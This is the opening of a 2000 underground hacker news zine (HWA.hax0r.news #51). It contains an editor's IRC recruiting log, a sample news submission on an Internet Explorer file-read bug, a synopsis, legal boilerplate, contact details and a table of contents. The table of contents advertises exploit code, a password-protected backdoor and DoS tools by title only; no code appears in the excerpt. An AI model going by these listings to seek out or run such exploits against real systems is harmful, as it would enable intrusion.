      [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =  
  ==========================================================================
    [=HWA 2000=]               Number 51 Volume 2 Issue 3 1999    Feb 2000
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  =                      "ABUSUS NON TOLLIT USUM"                          =
  ==========================================================================                                                                             

                    Editor: Cruciphux (cruciphux@dok.org)
            A Hackers Without Attitudes Production. (c) 1999, 2000
                      http://welcome.to/HWA.hax0r.news/
                      
                      
                      *** NEW WEB BOARD NOW ACTIVE ***
                      
              http://discserver.snap.com/Indices/103991.html
                      
  ==========================================================================                                                  
  
                    ____
                   / ___|_____   _____ _ __ __ _  __ _  ___
                  | |   / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
                  | |__| (_) \ V /  __/ | | (_| | (_| |  __/
                   \____\___/ \_/ \___|_|  \__,_|\__, |\___|
                                                 |___/

                                      
                This is #51 covering Feb 13th to March 12th, 2000              
                
         ** 516 People are on the email notify list as of this writing.
            see note below in the Help Out! section re:distribution. 
                   
                   
    
  ========================================================================== 
  
  
                     _   _      _        ___        _   _
                    | | | | ___| |_ __  / _ \ _   _| |_| |
                    | |_| |/ _ \ | '_ \| | | | | | | __| |
                    |  _  |  __/ | |_) | |_| | |_| | |_|_|
                    |_| |_|\___|_| .__/ \___/ \__,_|\__(_)
                                 |_|
  
  
  
  
  WANT TO HELP? like what can I do? some answers to common questions, taken
  straight from IRC since, well why re-write it? :) 
  
  
  ** Regarding the people on the email notification list with listbot.
  
     I am aware that it is a pain in the ass coming to download each 
     issue (unless you can click on the url in the message body and
     easily download each new version that way...) and I am interested
     in hearing ideas to help mass distribute this material in a better
     faster, more efficient manner. If you have any suggestions or can
     offer a method or service (I don't have access to majordomo etc)
     whereby the zine can be mass mailed to subscribers, let me know.
     
     And NO I won't file attach it to you all individually :-) 
     
     
  
  
  Early one night in #Hwa.hax0r.news ...
  
  <SugarKing> Cruciphux: so do you really need help? cause I can start getting
              articles for ya if you want/need them
  <Cruciphux> yes
  <Cruciphux> damnit
  <Cruciphux> I do need help
  <SugarKing> so what do I do.....look for articles...copy and paste them.....
              then hand them to you?
  <Cruciphux> what do you want to do? 
  <Cruciphux> if you wanna do that sure, email em to me like that
  <Cruciphux> must have a source and or url though
  <SugarKing> ok
  <Cruciphux> ppl always forget urls/sources and I can't print it without a 
              source
  <Cruciphux> if u do and I haven't already put the info in you 'win' a 
              Contributed by: space sn00zer! line under the article
  <Cruciphux> :)
  <SugarKing> hehe
  <Cruciphux> and if yer good at it and get stuff I've never seen (like isn't
              on my excite newsbot list or on HNN etc) then you get
  <Cruciphux> promoted to 'staff'
  <Cruciphux> etc
  <Cruciphux> I should put this in there actually so ppl know what to expect
  <SugarKing> ok cool
  <Cruciphux> and original articles? i'd kill for good original material
  <SugarKing> heh
  <Cruciphux> stress on the 'good' but i'm not too picky if someone wants to make
              a fool of themselves in public.
  <Cruciphux> :-o
  <SugarKing> so what kinda of articles.....anything? from programming to 
              hacking....etc?
  <Cruciphux> pretty much
  <SugarKing> heh
  <Cruciphux> technology, radio, science if it has a techno slant, and of course 
              internet/web security and hacking related
  <Cruciphux> u know the drill
  <SugarKing> yeah
  <Cruciphux> also
  <SugarKing> just checkin...
  <SugarKing> heh
  <Cruciphux> I need someone to do 'research' on web site defacements
  <Cruciphux> an adjunct to what attrition does
  <Cruciphux> like tell me about interesting defacements, I just print the sites
              list i get from attrition
  <SugarKing> like how....person who defaced......??.......??
  <SugarKing> ohh ok
  <Cruciphux> theres a mailing list you can get on that tells you when sites get
              cracked
  <Cruciphux> thats a biggie i'm gonna be asking for in this issue
  <Cruciphux> print the 'good' defacements (shit with an angle) and track down/
              identify defacers and groups
  <Cruciphux> etc
  <SugarKing> ok cool:)
  <Cruciphux> with an eye towards possible profiles (group) and interviews 
              (if they're doing something interesting)
  <Cruciphux> anything else?
  <SugarKing> that looks good:)  
  <SugarKing> it doesn't seem that hard when you hear about people doing it
  <Cruciphux> k lemme know if you wanna do anything and lemme know what you want 
              to do etc
  <SugarKing> but now it sure seems harder than expected
  <Cruciphux> heh
  <SugarKing> but it'll give me something to do at least
  <Cruciphux> well I do everything myself right now in free time and there are 
              areas that i'd like to follow up on and I just don't have the time
  <Cruciphux> so if ppl are willing to help i can keep putting out and hopefully
              things will get better too.
  <SugarKing> well....I'll do anything you want me to do.....but following up on
              defacements and getting articles seems good right now
  <Cruciphux> otherwise i'd have to think about either downsizing or closing down
              and I don't want to do that really.
  <Cruciphux> ok good stuff
  <Cruciphux> local and 'small' stuff like whats going on at your schools computer
              lab ie: security policies is good angles for writing your own stuff
              too if that tickles your fancy
  <Cruciphux> doesn't have to be major world news
  <Cruciphux> *g*
  <SugarKing> ok
  *** Quits: narq (I am free of all prejudices. I hate everyone equally)
  
  -=- 
  
  And, sending in articles etc...
  
  Instead of emailing me this: (txt formatted to 80 cols)
  
  <->
  
  
  Patching IE Security, Yet Again 


  Security vulnerability affects the Win 2000 browser. 

  Windows 2000 is finally here. And so is a patch for a security vulnerability 
  in the Internet browser that is bundled with the new operating system. 
  Microsoft issued the patch on Wednesday, the eve of the release of its 
  much-delayed operating system.

  The bug, which Microsoft calls the Image Source Redirect vulnerability, makes 
  it possible for a malicious Web site operator to read certain types of files 
  on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, 
  and 5.01.

  This means that the iteration of IE that is distributed with Windows 2000, 
  version 5, also is affected by the bug.

  When you want to view a new page with a different domain than the one 
  currently being viewed, a Web server sends the page to your IE browser window. 
  IE then checks the server's permissions on the new page.

  The vulnerability makes it possible for a Web server to open a browser window 
  to a file stored on the IE user's computer, and then switch to a page in the 
  server's domain, gaining access to the contents of the user's files in the 
  process, Microsoft says in a statement.

  Any data that can be seen is accessible only for a short period of time, and 
  the Web site operator would need to know, or guess, the names and locations of 
  files. The operator would also be able to view only file types that can be 
  opened in a browser window, including .txt files, Microsoft says.


  http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html
  
  
  
  <->
  
  ::
  YOU can go ahead and do some editing yourself and send it like this:
  ::
  
  <->
  
  
  Patching IE Security, Yet Again 
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Contributed by SugarKing

  Security vulnerability affects the Win 2000 browser. 

  Source: PCworld
  url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html


  Windows 2000 is finally here. And so is a patch for a security vulnerability 
  in the Internet browser that is bundled with the new operating system. 
  Microsoft issued the patch on Wednesday, the eve of the release of its 
  much-delayed operating system.

  The bug, which Microsoft calls the Image Source Redirect vulnerability, makes 
  it possible for a malicious Web site operator to read certain types of files 
  on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0, 
  and 5.01.

  This means that the iteration of IE that is distributed with Windows 2000, 
  version 5, also is affected by the bug.

  When you want to view a new page with a different domain than the one 
  currently being viewed, a Web server sends the page to your IE browser window. 
  IE then checks the server's permissions on the new page.

  The vulnerability makes it possible for a Web server to open a browser window 
  to a file stored on the IE user's computer, and then switch to a page in the 
  server's domain, gaining access to the contents of the user's files in the 
  process, Microsoft says in a statement.

  Any data that can be seen is accessible only for a short period of time, and 
  the Web site operator would need to know, or guess, the names and locations of 
  files. The operator would also be able to view only file types that can be 
  opened in a browser window, including .txt files, Microsoft says.

  @HWA


  <->
  
  ::
  
  Doesn't seem like much but saves me a bunch of work and I can plug it straight into 
  the zine text...

  
  -=-
  
  Etc .. any other questions/comments/ideas/etc email me, you know
  the addy...
  
  -=-                       

 
  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ 
  #                                                                         #
  @      The HWA website is sponsored by CUBESOFT communications I highly   @ 
  #      recommend you consider these people for your web hosting needs,    #
  @                                                                         @   
  #      Web site sponsored by CUBESOFT networks http://www.csoft.net       #
  @      check them out for great fast web hosting!                         @ 
  #                                                                         # 
  #      http://www.csoft.net/~hwa                                          @
  @                                                                         #  
  @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                    
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
 
                    ____                              _
                   / ___| _   _ _ __   ___  _ __  ___(_)___
                   \___ \| | | | '_ \ / _ \| '_ \/ __| / __|
                    ___) | |_| | | | | (_) | |_) \__ \ \__ \
                   |____/ \__, |_| |_|\___/| .__/|___/_|___/
                          |___/            |_|

     
   
   SYNOPSIS (READ THIS)
   --------------------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended, however, to complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                         Welcome to HWA.hax0r.news ... 

   =-----------------------------------------------------------------------=
   
    
    "If life is a waste of time and time is a waste of life, then lets all get
     wasted and have the time of our lives"
    						- kf

   
                            ____|  _|            |
                            __|   |   __ \   _ \ __|
                            |     __| |   |  __/ |
                           _____|_|  _|  _|\___|\__| 

    Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
    
    **************************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed   ***
    ***                                                                    ***
    *** please join to discuss or impart news on the zine and around the   ***
    *** scene or just to hang out, we get some interesting visitors you    ***
    *** could be one of em.                                                ***
    ***                                                                    ***
    *** Note that the channel isn't there to entertain you its purpose is  ***
    *** to bring together people interested and involved in the underground***
    *** to chat about current and recent events etc, do drop in to talk or ***
    *** hangout. Also if you want to promo your site or send in news tips  ***
    *** its the place to be, just remember we're not #hack or #chatzone... ***
    **************************************************************************
    
    
    

        
  =--------------------------------------------------------------------------=
  
  
                     _____            _             _  
                    / ____|          | |           | |
                   | |     ___  _ __ | |_ ___ _ __ | |_ ___
                   | |    / _ \| '_ \| __/ _ \ '_ \| __/ __|
                   | |___| (_) | | | | ||  __/ | | | |_\__ \
                    \_____\___/|_| |_|\__\___|_| |_|\__|___/


           
  =--------------------------------------------------------------------------=
  [ INDEX ]                     HWA.hax0r.news                            #51
  =--------------------------------------------------------------------------=
    Key     Intros                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. LEGAL & COPYRIGHTS ..............................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. THIS IS WHO WE ARE ..............................................
            
             ABUSUS NON TOLLIT USUM? 
             This is (in case you hadn't guessed) Latin, and loosely translated
             it means "Just because something is abused, it should not be taken
             away from those who use it properly". This is our new motto.

  =--------------------------------------------------------------------------=
    Key     Content    
  =--------------------------------------------------------------------------=
  
  
    "The three most dangerous things in the world are a programmer with a
     soldering iron, a hardware type with a program patch and a user with
     an idea." - Unknown

  

    01.0  .. GREETS ...........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ............................
     01.2 .. Mailbag ..........................................................
    02.0  .. From the Editor................................................... 
    03.0  .. Who are Hackers anyway?...........................................
    04.0  .. Mr DoS: Mafiaboy isn't done baring his teeth (Vetesgirl) + (ABC)..
    04.1  .. More on MafiaBoy. Some IRC logs of his rants in hacker channels...
    04.2  .. Mounties Know Mafiaboy............................................
    05.0  .. Updated proxies and wingates...from irc4all and elsewhere.........
    06.0  .. HNN:Feb 14:FBI Zeros in on Two Possible Suspects..................
    07.0  .. A brief history of hackers By meliksah............................
    08.0  .. New phreaking zines released can you dig the retro?...............
    09.0  .. Has your PC been Hi-Jacked??......................................
    10.0  .. Interview with Sect0r.............................................
    11.0  .. Is aureate.com spying on you?.....................................
    12.0  .. German youth charged in DoS attacks...............................
    13.0  .. DigiAlmty, NASA hacker gets nabbed................................
    14.0  .. Discussion on DigiAlmty and general underground chat..............
    15.0  .. Microsoft cancels tournament after cybercrime.....................
    16.0  .. Microsoft on 'Open Windows': Baloney!.............................
    17.0  .. Defending privacy and law enforcement.............................
    18.0  .. Cyber Safe or Gov't Surveillance? ................................
    19.0  .. First Win2000 Fix Out ............................................
    20.0  .. Boy, 14, charged with hacking.....................................
    21.0  .. Defense Agency plans cyber-terrorism unit ........................
    22.0  .. WWW,HACK,CO.ZA is back online.....................................      
    22.1  .. (Update: Offline again!?!)........................................
    23.0  .. Dangerous hacking agent discovered (Troj_Trinoo)..................
    24.0  .. Hacking or administrating your school? here's The Big-Lan FAQ.....    
    25.0  .. Exclusive: Fuqrag gets raided by OSI, NASA, FBI, Interpol.........     
    26.0  .. Exclusive: Team Ech0 (pre-bust) interview.........................
    27.0  .. Phreaking good fun with DTMF and other goodies....................
    27.1  .. Introducing b0f (BufferOverflow Security).........................
    28.0  .. New way of exploiting buffer overflows ret-into-libc (b0f)........
    29.0  .. warftpd.c exploit code from b0f...................................      
    30.0  .. FTPCAT 1.0 by lamagra (b0f).......................................
    31.0  .. Redhat 6.1 /usr/bin/man exploit. Gives egid=man by venglin (b0f)..
    32.0  .. Proftpd pre <=6 remote exploit for linuxppc by lamagra (b0f)......
    33.0  .. Dopewars 1.4.4 remote exploit for server and client (b0f).........
    34.0  .. Simple Backdoor. Shell on a port with password support (b0f)......
    35.0  .. Pirch98 ident/fserve daemon DoS attack. by eth0 (b0f).............
    36.0  .. Simple ipchains frontend script  by eth0 (b0f)....................
    37.0  .. HNN:Feb 14th:Clinton Calls for Cyber Security Summit. ............
    38.0  .. HNN:Feb 14th:Black, White, Grey, Where Exactly is the Line. ......
    39.0  .. HNN:Feb 14th:Italian Cyber Criminals Apprehended .................
    40.0  .. HNN:Feb 14th:RealNames Customer Info and CC Numbers Stolen .......
    41.0  .. HNN:Feb 14th:Hacker Hijack or Misconfigured Server? ..............
    42.0  .. HNN:Feb 14th:Windows 2000 Has 63,000 Bugs ........................
    43.0  .. HNN:Feb 15th:Buffer overflow: DeCSS...............................
    44.0  .. HNN:Feb 15th:Suspects Sought in DDoS Attacks .....................
    45.0  .. HNN:Feb 15th:Hackers Invited to Summit............................
    46.0  .. HNN:Feb 15th:Stacheldraht Author Retires..........................
    47.0  .. HNN:Feb 15th:CNN News Chat with Clinton Compromised?..............
    48.0  .. HNN:Feb 15th:RSA Web Page Redirected..............................
    49.0  .. HNN:Feb 15th:Doubleclick Announces New Privacy Plan...............
    50.0  .. HNN:Feb 16th:UCITA Passes In Virginia.............................
    51.0  .. HNN:Feb 16th:Read Our Lips: No New Net Laws.......................
    52.0  .. HNN:Feb 16th:Tax Returns Inadvertently Made Public................
    53.0  .. HNN:Feb 16th:AOL Intruder Sentence Increased......................
    54.0  .. HNN:Feb 16th:China Denies Defacing Japanese Sites.................
    55.0  .. HNN:Feb 16th:Tulsa Police Break Up Online 'Gang'..................
    56.0  .. HNN:Feb 17th:Feds still Investigating.............................
    57.0  .. HNN:Feb 17th:Correction: UCITA Did Not Pass In VA, Yet............
    58.0  .. HNN:Feb 17th:Defense Message System Has Serious Holes.............
    59.0  .. HNN:Feb 17th:CIA Startup Works on Net Security....................
    60.0  .. HNN:Feb 20th:Bill Will Double Title 18 Penalties..................
    61.0  .. HNN:Feb 20th:Racketeering Charges Sought for Cyber Criminals......
    62.0  .. HNN:Feb 20th:Serious Online Security Issues Found at EPA..........
    63.0  .. HNN:Feb 20th:FBI Reveals ACES.....................................
    64.0  .. HNN:Feb 20th:New Version of DeCSS Available.......................
    65.0  .. HNN:Feb 20th:Y2K Hack Planned for Israel, Local Officials Nervous.
    66.0  .. HNN:Feb 21st:French Say Windows is BackDoored By NSA..............
    67.0  .. HNN:Feb 21st:France Reported to Have Frenchelon...................
    68.0  .. HNN:Feb 21st:DDoS Attacks Mask the Real Threat....................
    69.0  .. HNN:Feb 21st:Earlier Attacks on IRC Servers Could Have Been a Warning
    70.0  .. HNN:Feb 21st:New DDoS Attacks Stories and Angles..................
    71.0  .. HNN:Feb 21st:Student Charged with Breaking Into High School Systems
    72.0  .. HNN:Feb 21st:Japan To Increase Cyber Defense......................
    73.0  .. HNN:Feb 21st:Possible Privacy Violation in Apple's Sherlock.......
    74.0  .. HNN:Feb 22nd:Sympatico Quiet on Search for mafiaboy ..............
    75.0  .. HNN:Feb 22nd:ISPs Look at Customer Security as Low Priority .....
    76.0  .. HNN:Feb 22nd:Circumventing DVD Zoning ............................    
    77.0  .. HNN:Feb 22nd:Voters Kill Filter Proposal..........................
    78.0  .. HNN:Feb 22nd:Former CIA Director Regrets Security Breach .........
    79.0  .. HNN:Feb 22nd:New Version of DeCSS Available ......................
    80.0  .. HNN:Feb 22nd:Windows-NT vs. CP/M .................................    
    81.0  .. HNN:Feb 24th:DigiAlmty Busted By Feds.............................
    82.0  .. HNN:Feb 24th:ISPs Form Alliance To Prevent Attacks................
    83.0  .. HNN:Feb 24th:Proposed Y2hacK Ban Not Getting Support..............
    84.0  .. HNN:Feb 24th:Microsoft Web Sites Attacked.........................
    85.0  .. HNN:Feb 24th:New DDoS Tool Released...............................
    86.0  .. HNN:Feb 25th:NDB Hit by Cyber Vandals.............................
    87.0  .. HNN:Feb 25th:Y2K Leap Day.........................................
    88.0  .. HNN:Feb 25th:Bernstein Allowed to Post Snuffle....................
    89.0  .. HNN:Feb 26th:FBI Hit with DOS.....................................
    90.0  .. HNN:Feb 26th:Police Monitor 170,000 Pay Phone Calls...............
    91.0  .. HNN:Feb 26th:Echelon on 60 Minutes................................
    92.0  .. HNN:Feb 26th:French Smart Card Researcher Sentenced...............
    93.0  .. HNN:Feb 26th:BT Network Crashed, Reason Unknown ..................
    94.0  .. HNN:Feb 26th:ISP Loses User Names And Passwords...................
    95.0  .. HNN:Feb 29th:Senate Hearings on DDoS Attacks Today................
    96.0  .. HNN:Feb 29th:NSA and CIA Form Third Secret Agency SCS.............
    97.0  .. HNN:Feb 29th:Barr Responds To NSA.................................
    98.0  .. HNN:Feb 29th:Title Email Labeled as Internet Terrorism............
    99.0  .. HNN:Feb 29th:DDoS Commentary......................................
   100.0  .. HNN:Feb 29th:Two Sites in Singapore Compromised...................
   101.0  .. HNN:Feb 29th:Swedish Intruders Get Probation......................
   102.0  .. HNN:Mar 1st:Still No Motive for DDoS Attacks......................
   103.0  .. HNN:Mar 1st:First Canadian Computer Crime Conviction..............
   104.0  .. HNN:Mar 1st:Major Systems Fail in Japan On Leap Day...............
   105.0  .. HNN:Mar 1st:HP's Cyber Insurance Takes a Hit......................
   106.0  .. HNN:Mar 1st:Security Accountability is Still Low..................
   107.0  .. HNN:Mar 2nd:Mitnick to Testify at Senate Today....................
   108.0  .. HNN:Mar 2nd:Utah Passes Net Filtering Law.........................
   109.0  .. HNN:Mar 2nd:Restaurants Gather Data on Customers..................
   110.0  .. HNN:Mar 2nd:Expedia Takes Charge for Fraud........................
   111.0  .. HNN:Mar 2nd:CD Universe Attempts to Recover From Database Theft...
   112.0  .. HNN:Mar 2nd:Sony Bungles Personal Info On Web.....................             
   113.0  .. HNN:Mar 2nd:CIA Report on Deutch Posted to Net....................
   114.0  .. HNN:Mar 2nd:Brazil Authorities Try to Combat Online Criminals.....   
   115.0  .. HWA:IGMP (kod.c kox.c trash2.c) Windows DoS (Old/but still effective)
   116.0  .. HNN:Mar 3rd:Coolio Charged With Defacement .......................
   117.0  .. HNN:Mar 3rd:US Army Web Attacker Sentenced (mindphasr/gH).........
   118.0  .. HNN:Mar 3rd:Who is Liable If Computers Used in Attacks? ..........
   119.0  .. HNN:Mar 3rd:Email Threat Lands Teenager In Jail...................
   120.0  .. HNN:Mar 3rd:Japanese Afraid of Cult Software .....................
   121.0  .. HNN:Mar 3rd:B2B Site Compromised Hours After Going Online ........             
   122.0  .. HNN:Mar 3rd:State of Maine May Give Computers to All Students. ...             
   123.0  .. HNN:Mar 6th:Coolio Not a Suspect in DDoS Attacks .................
   124.0  .. HNN:Mar 6th:Gatsby of the PhoneMasters gets 18 Months ............             
   125.0  .. HNN:Mar 6th:Cyber Intrusion Used to Cover Up Software Glitch .....
   126.0  .. HNN:Mar 6th:Microsoft Hit in Israel ..............................
   127.0  .. HNN:Mar 6th:Credit Card Numbers Used in Scam .....................
   128.0  .. HNN:Mar 6th:Iceland Sells Its Soul................................            
   129.0  .. HNN:Mar 6th: Clinton Says No To Email ............................
   130.0  .. HNN:Mar 7th:FidNet is Not Enough .................................
   131.0  .. HNN:Mar 7th:RIP Bill Comes Under Fire In UK ......................
   132.0  .. HNN:Mar 7th:Curador Returns With More CC Numbers .................
   133.0  .. HNN:Mar 7th:Taiwan Fears Computer Attack From China ..............
   134.0  .. HNN:Mar 7th:Hong Kong Beefs Up Online Police Presence ............
   135.0  .. HNN:Mar 7th:ATM and Frame Relay Vulnerable to Attack .............
   136.0  .. HNN:Mar 8th:EFF Looking For Lawyers For DeCSS Case ...............
   137.0  .. HNN:Mar 8th:Cell Surfing Not Anonymous Either ....................
   138.0  .. HNN:Mar 8th:Freenet Promises True Free Speech ....................
   139.0  .. HNN:Mar 8th:New Bills Before Congress ............................
   140.0  .. HNN:Mar 8th:Security Focus Hires Kevin Poulsen ...................
   141.0  .. HNN:Mar 9th:Coolio Charged with Web Defacements ..................
   142.0  .. HNN:Mar 9th:Grades Altered At MIT By Student .....................
   143.0  .. HNN:Mar 9th:Lloyd's Defacer Arrested and Released ................
   144.0  .. HNN:Mar 9th:Cross Green Market Raided ............................
   145.0  .. HNN:Mar 9th:AT+T Sends Private Info of Cell Surfers ..............
   146.0  .. HNN:Mar 10th: MIT Blames Cyber Vandals For Sorting Error .........
   147.0  .. HNN:Mar 10th:NY Wants Privacy for Consumers ......................
   148.0  .. HNN:Mar 10th:Curador Taunts Police ...............................
   149.0  .. HNN:Mar 10th:DDoS Attacks Used As Reason for National Court Order,
   150.0  .. HNN:Mar 10th:Voluntary Compliance With Security Practices Recommended 
   151.0  .. HNN:Mar 10th:Chinese Gangs Blamed For Identity Theft .............
   152.0  .. HNN:Mar 10th: U.S. Urges Internet Businesses to Help Fight Crime .
   153.0  .. HNN:Mar 10th:Symantec Wants List Removed .........................
   154.0  .. Janet Reno and her commie crusade into a police state.............
   155.0  .. FLYING: Xwindows game leaves files readable in system.............
   156.0  .. AIM messenger DoS.................................................
   157.0  .. Bypassing authentication on Axis StorPoint CD;....................
   158.0  .. Securax advisory, various BSOD (Windows) problems.................
   159.0  .. How to be a Script Kiddy by DrHamstuh.............................
   160.0  .. nfoSrch.cgi vulnerable to remote command execution................
   161.0  .. New magazine sampler: b0g #2......................................
   162.0  .. FreeBSD 3.4-STABLE exploit doscmd.c...............................
   163.0  .. cfingerd 1.3.3 (*bsd) root sploit.................................
   164.0  .. FreeBSD 3.3-RELEASE /sbin/umount exploit..........................
   165.0  .. l0pht advisory 03/06/2000 ClipArt gallery overflow................
   166.0  .. ISN:FBI views hackers as 'racketeers'.............................
   167.0  .. ISN:Pentagon probe targets Deutch.................................
   168.0  .. ISN:US Embassy's software originated back in the USSR.............
   169.0  .. ISN:Hacker posts phony press release..............................
   170.0  .. ISN:Hacker, Media Hype and, Disinformation........................
   171.0  .. ISN:US Secret agents work at Microsoft............................
   172.0  .. ISN:Greek hackers attack U.S military installation?...............
   173.0  .. ISN:KGB successor paid to infiltrate internet.....................
   174.0  .. ISN:REVIEW: Security Technologies for the World Wide Web..........
   175.0  .. ISN:Infosecurity at the White House...............................
   176.0  .. ISN:New hacker software could spread by email.....................
   177.0  .. ISN:FBI Admits site was defaced...................................
   178.0  .. IRIX 5.3 and 6.2 remote bind iquery overflow by LSD...............
   179.0  .. FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit...................
   180.0  .. Infradig 1.225 for Windows remote security hole ..................
   181.0  .. Remote exploit for Mailer 4.3 - Win 9x/NT. By Cybz................
   182.0  .. Variation of the win98 con exploit that crashes netscape as well..
   183.0  .. Microsoft unsigned .CAB exploit...................................
        
    =-------------------------------------------------------------------------=
    
        
    AD.S  .. Post your site ads or etc here, if you can offer something in 
             return thats tres cool, if not we'll consider ur ad anyways so
             send it in. ads for other zines are ok too btw just mention us 
             in yours, please remember to include links and an email contact.
             
    Ha.Ha .. Humour and puzzles  ............................................
             
              Oi! laddie! send in humour for this section! I need a laugh 
              and its hard to find good stuff... ;)...........................

    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
       *      COMMON TROJAN PORTS LISTING.....................................       
     A.1   .. PHACVW linx and references......................................
     A.2   .. Hot Hits (.gov and .mil + other interesting traffic on our site)
     A.3   .. Mirror Sites list...............................................
     A.4   .. The Hacker's Ethic 90's Style..................................
     A.5   .. Sources........................................................
     A.6   .. Resources......................................................
     A.7   .. Submission information.........................................
     A.8   .. Mailing lists information......................................
     A.9   .. Whats in a name? why HWA.hax0r.news??..........................
     A.10  .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
     A.11  .. Underground and (security?) Zines..............................
     
        *  Feb 2000 moved opening data to appendices, A.2 through A.10, probably
           more to be added. Quicker to get to the news, and info etc... - Ed 
  =--------------------------------------------------------------------------=
     
     @HWA'99, 2000
     
     

     
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

                         _                     _
                        | |    ___  __ _  __ _| |
                        | |   / _ \/ _` |/ _` | |
                        | |__|  __/ (_| | (_| | |
                        |_____\___|\__, |\__,_|_|                           
                                   |___/
                               


     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF 
     THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE 
     RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
     IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS 
     (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE 
     GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS 
     Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
     ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is 
     http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE 
     ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL 
     I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email 
                         
                         cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
     ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
     AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND 
     REDISTRIBUTE/MIRROR. - EoD
     
     
                            ** USE NO HOOKS **

 
      Although this file and all future issues are now copyright, some of the 
      content holds its  own copyright and these are printed and respected. News 
      is news so i'll print any and all news but will quote sources when the 
      source is known, if its good enough for CNN its good enough for me. And 
      i'm doing it for free on my own time so pfffft. :)

     No monies are made or sought through the distribution of this material.      
     If you have a problem or concern email me and we'll discuss it.

     HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts      
     Warez Archive?), and does not condone 'warez' in any shape manner or 
     form, unless they're good, fresh 0-day and on a fast site. <sic>
 
     cruciphux@dok.org
 
     Cruciphux [C*:.] HWA/DoK Since 1989



00.1 CONTACT INFORMATION AND MAIL DROP 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                     ____            _             _
                    / ___|___  _ __ | |_ __ _  ___| |_ ___
                   | |   / _ \| '_ \| __/ _` |/ __| __/ __|
                   | |__| (_) | | | | || (_| | (__| |_\__ \
                    \____\___/|_| |_|\__\__,_|\___|\__|___/


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:
    

	    	HWA NEWS
	    	P.O BOX 44118
	    	370 MAIN ST. NORTH
	    	BRAMPTON, ONTARIO
	    	CANADA
	    	L6V 4H5
	    
	    
    
    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
    ~~~~~~~  are reading this from some interesting places, make my day and 
             get a mention in the zine, send in a postcard, I realize that 
             some places it is cost prohibitive but if you have the time and
             money be a cool dude / gal and send a poor guy a postcard 
             preferably one that has some scenery from your place of 
